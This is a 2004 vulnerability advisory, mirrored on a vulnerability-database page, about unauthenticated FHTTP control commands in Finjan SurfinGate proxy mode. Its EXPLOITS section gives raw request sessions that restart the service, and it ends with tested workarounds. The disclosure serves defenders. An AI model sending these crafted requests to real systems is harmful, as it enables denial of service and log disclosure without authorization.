Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

finjanSurfinGate.txt

🗓️ 23 Jan 2004 00:00:00Reported by David ByrneType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Finjan SurfinGate has vulnerabilities allowing unauthorized commands in proxy mode, risking service disruption.

Code
`  
  
VENDOR: Finjan (www.finjan.com)  
  
PRODUCT: SurfinGate (recently renamed “Vital Security”)  
  
VERSIONS: All releases of versions 6 & 7 as of 1/22/2004.   
  
Older versions have not been tested.  
  
NOTIFICATION: The vendor has known of the problem over a year  
  
  
  
  
  
  
  
DESCRIPTION  
  
==========================================================  
  
Finjan SurfinGate provides malicious code scanning for web traffic. It focuses on behavior-based filtering of active content (e.g. ActiveX, Java, scripting), but also integrates a McAfee virus scanner.   
  
  
  
  
  
PROBLEM  
  
==========================================================  
  
When running in proxy mode, properly crafted requests sent to Finjan SurfinGate can mimic control commands. Known vulnerabilities include viewing log data and causing the service to restart, potentially resulting in a DoS situation. The application’s architecture suggests there is a potential for modifying the filtering policy as well.  
  
  
  
  
  
DETAILS  
  
==========================================================  
  
SurfinGate scanning servers receive commands by listening on a control port (TCP/3141 by default) for an HTTP-based protocol called “FHTTP”. Normally the FHTTP commands come from a management console or policy database server, but commands are not authenticated and can come from any source, including the local HTTP proxy. This allows any user to issue server commands via the proxy server.   
  
  
  
The “finjan-parameter-type” parameter is the actual command. Known commands include “restart” to restart the service, “getlastmsg” to view log information and “online” to force a policy update from the database server. Running “strings” on the server binary (“bin/FinjanServer”) reveals other possible targets.  
  
  
  
  
  
EXPLOITS  
  
==========================================================  
  
Below are two examples of sessions with the proxy server that issue a restart command.  
  
  
  
Example 1:  
  
>>> CONNECT LOCALHOST:3141 HTTP/1.0  
  
>>>  
  
  
  
<<< HTTP/1.0 200 Connection established  
  
<<< Proxy-agent: Finjan-SurfinGate/6.0  
  
<<<  
  
  
  
>>> FINJAN /stam HTTP/1.0  
  
>>> finjan-version: fhttp/1.0  
  
>>> finjan-command: custom  
  
>>> finjan-parameter-category: console  
  
>>> finjan-parameter-type: restart  
  
>>> content-length: 0  
  
>>>  
  
  
  
<<< HTTP/1.0 200 OK  
  
<<< finjan-version: fhttp/1.0  
  
<<<  
  
<<<  
  
  
  
  
  
Example 2:  
  
>>> FINJAN localhost:3141/stam HTTP/1.0  
  
>>> finjan-version: fhttp/1.0  
  
>>> finjan-command: custom  
  
>>> finjan-parameter-category: console  
  
>>> finjan-parameter-type: restart  
  
>>> content-length: 0  
  
>>>  
  
  
  
<<< HTTP/1.0 200 OK  
  
<<< finjan-version: fhttp/1.0  
  
<<<  
  
<<<  
  
  
  
  
  
WORKAROUNDS  
  
==========================================================  
  
Firewall filtering will is not adequate since the commands come over the same port that services legitimate HTTP requests. These are possible workarounds that have been successfully tested.  
  
  
  
* Use a proxy server between the user and SurfinGate server to block CONNECT commands to ports other than 443 AND block non-standard HTTP commands (i.e. “FINJAN”).  
  
  
  
* Inside the SurfinGate policy, add URL rules to block all access to any hostname or IP address that would connect to the FHTTP port. This can be a long list; localhost, 127.0.0.1, the hostname, loghost for Solaris machines, the IP address SurfinGate binds to, any DNS entries, etc.  
  
  
  
* Change the control port to something besides 3141. This is pretty weak, but better than nothing.  
  
  
  
  
  
NOTES  
  
==========================================================  
  
Just to reiterate, the ability to change the policy has not been confirmed, but seems likely. The SurfinGate database server and SurfinShield (a desktop product) database server also use FHTTP for management commands, so that is a likely source for more vulnerabilities to explore. Because the SurfinGate scanning/proxy server has to communicate with the database server using FHTTP, there is guaranteed access to the database via the proxy if the hostname or IP address is known. The workarounds listed above should also work for restricting access to the database server, but have not been tested.  
  
  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Jan 2004 00:00Current
7.4High risk
Vulners AI Score7.4
malicious code scanningcontrol commandsservice restartpotential doshttp-based protocol.
25